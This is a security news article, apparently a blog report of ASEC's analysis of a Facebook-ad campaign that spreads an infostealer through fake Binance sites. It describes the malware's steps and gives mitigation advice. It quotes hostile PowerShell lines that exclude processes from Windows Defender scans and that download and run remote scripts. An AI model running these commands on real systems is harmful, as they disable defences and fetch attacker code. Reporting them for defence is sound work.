Do Son 
Fake advertisements | Image: ASEC
AhnLab Security Intelligence Center (ASEC) has uncovered a sophisticated multi-stage malware campaign that targets cryptocurrency users through malicious Facebook ads. The campaign uses fake Binance-branded websites to distribute an Infostealer capable of system reconnaissance, screen capture, credential theft, and PowerShell-based persistence.
At the heart of the campaign is social engineering via advertising. Threat actors purchase Facebook ads that mimic popular cryptocurrency platforms like Binance. When users click on “Learn More” or “Download,” they are redirected to a spoofed website, but only if certain tracking parameters—such as utm_campaign, cid, or fbclid—are present in the URL. This filtering ensures that the ads are shown only to specific, targeted users.
Once the user lands on the malicious site, they’re prompted to download a Windows installer.
“When the user clicks the button, a file named ‘installer.msi’ is downloaded… a specific port (30303) on the local host is opened… and begins to communicate with the system through this port.”
Upon installation of installer.msi, the malware establishes local communication between the compromised host and a JavaScript component embedded in the spoofed website. Depending on the commands sent by the server, the malware executes a sequence of actions, including:
| Parameter | Function |
|---|---|
/file |
Downloads the MSI installer |
/r |
Queries GUID from registry |
/w |
Retrieves system info using WMI |
/worker |
Sends scheduler instructions in XML |
If the malware detects a virtual environment, it halts execution. If not, it proceeds with downloading and executing a PowerShell-based task scheduler, laying the groundwork for persistent infection.
“When a scheduler is registered, events in the ‘Application’ log trigger the execution of a PowerShell script encoded in BASE64.”
The malware ensures its persistence and avoids detection by manipulating Windows Defender settings. PowerShell scripts execute commands such as:
- Exclude PowerShell from Defender scans
Add-MpPreference -ExclusionProcess (Get-Process -PID $PID).MainModule.ModuleName - Exclude working directory from scans
Add-MpPreference -ExclusionPath (Get-Location) - 3–4. Download and execute further scripts
Invoke-WebRequest -UseBasicParsing <malicious_domain> | Invoke-Expression
This recursive download mechanism ensures that the malware’s functionality can be updated or expanded on the fly.
“The downloaded script then downloads and executes additional scripts from an external source,” the report confirms, exposing a well-architected, modular attack chain.
The final payload is an Infostealer. It exfiltrates:
- System details: OS version, memory, CPU, and disk info
- Browser data: Saved credentials, cookies from Chrome and Firefox
- Telegram data
- Files: .docx, .pdf, .rdp, .ovpn, and more
- Keystrokes: Logs user activity via keylogger module
The goal is to harvest as much sensitive information as possible, enabling potential account takeover, identity theft, and espionage.
Users are urged to exercise extreme caution with downloads originating from ads:
“Users are advised to check the domain of the website when downloading files to ensure that it is the official website.”
ASEC emphasizes that many ad-based downloads are potentially unwanted programs (PUPs) or outright malware. To mitigate risk:
- Avoid downloading software promoted through social media ads.
- Always verify the domain against official sources.
- Keep antivirus and OS fully updated.
- Monitor system processes and scheduled tasks for anomalies.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
